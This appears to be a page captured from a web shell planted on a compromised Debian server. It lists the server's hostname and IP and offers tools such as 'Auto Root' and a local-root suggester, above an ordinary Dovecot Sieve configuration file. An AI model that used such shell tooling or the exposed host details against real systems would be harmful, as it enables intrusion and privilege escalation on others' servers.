Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
dovecot /
conf.d /
Delete
Unzip
Name
Size
Permission
Date
Action
10-auth.conf
5.17
KB
-rw-r--r--
2016-12-03 18:13
10-director.conf
1.85
KB
-rw-r--r--
2016-12-03 18:13
10-logging.conf
2.74
KB
-rw-r--r--
2016-12-03 18:13
10-mail.conf
15.81
KB
-rw-r--r--
2020-08-14 18:28
10-master.conf
3.3
KB
-rw-r--r--
2016-12-03 18:13
10-ssl.conf
2.21
KB
-rw-r--r--
2020-08-24 23:53
10-tcpwrapper.conf
291
B
-rw-r--r--
2020-08-14 18:28
15-lda.conf
1.63
KB
-rw-r--r--
2016-12-03 18:13
15-mailboxes.conf
2.74
KB
-rw-r--r--
2016-12-03 18:13
20-imap.conf
3.22
KB
-rw-r--r--
2016-12-03 18:13
20-lmtp.conf
936
B
-rw-r--r--
2016-12-03 18:13
20-pop3.conf
3.97
KB
-rw-r--r--
2016-12-03 18:13
90-acl.conf
676
B
-rw-r--r--
2016-12-03 18:13
90-plugin.conf
292
B
-rw-r--r--
2016-12-03 18:13
90-quota.conf
2.44
KB
-rw-r--r--
2016-12-03 18:13
90-sieve-extprograms.conf
1.79
KB
-rw-r--r--
2020-08-14 18:28
90-sieve.conf
10.47
KB
-rw-r--r--
2020-08-14 18:28
auth-checkpassword.conf.ext
499
B
-rw-r--r--
2016-12-03 18:13
auth-deny.conf.ext
489
B
-rw-r--r--
2016-12-03 18:13
auth-dict.conf.ext
343
B
-rw-r--r--
2016-12-03 18:13
auth-master.conf.ext
561
B
-rw-r--r--
2016-12-03 18:13
auth-passwdfile.conf.ext
515
B
-rw-r--r--
2016-12-03 18:13
auth-sql.conf.ext
788
B
-rw-r--r--
2016-12-03 18:13
auth-static.conf.ext
611
B
-rw-r--r--
2016-12-03 18:13
auth-system.conf.ext
2.13
KB
-rw-r--r--
2016-12-03 18:13
auth-vpopmail.conf.ext
330
B
-rw-r--r--
2016-12-03 18:13
Save
Rename
# Sieve Extprograms plugin configuration # Don't forget to add the sieve_extprograms plugin to the sieve_plugins setting. # Also enable the extensions you need (one or more of vnd.dovecot.pipe, # vnd.dovecot.filter and vnd.dovecot.execute) by adding these to the # sieve_extensions or sieve_global_extensions settings. Restricting these # extensions to a global context using sieve_global_extensions is recommended. plugin { # The directory where the program sockets are located for the # vnd.dovecot.pipe, vnd.dovecot.filter and vnd.dovecot.execute extension # respectively. The name of each unix socket contained in that directory # directly maps to a program-name referenced from the Sieve script. #sieve_pipe_socket_dir = sieve-pipe #sieve_filter_socket_dir = sieve-filter #sieve_execute_socket_dir = sieve-execute # The directory where the scripts are located for direct execution by the # vnd.dovecot.pipe, vnd.dovecot.filter and vnd.dovecot.execute extension # respectively. The name of each script contained in that directory # directly maps to a program-name referenced from the Sieve script. #sieve_pipe_bin_dir = /usr/lib/dovecot/sieve-pipe #sieve_filter_bin_dir = /usr/lib/dovecot/sieve-filter #sieve_execute_bin_dir = /usr/lib/dovecot/sieve-execute } # An example program service called 'do-something' to pipe messages to #service do-something { # Define the executed script as parameter to the sieve service #executable = script /usr/lib/dovecot/sieve-pipe/do-something.sh # Use some unprivileged user for executing the program #user = dovenull # The unix socket located in the sieve_pipe_socket_dir (as defined in the # plugin {} section above) #unix_listener sieve-pipe/do-something { # LDA/LMTP must have access # user = vmail # mode = 0600 #} #}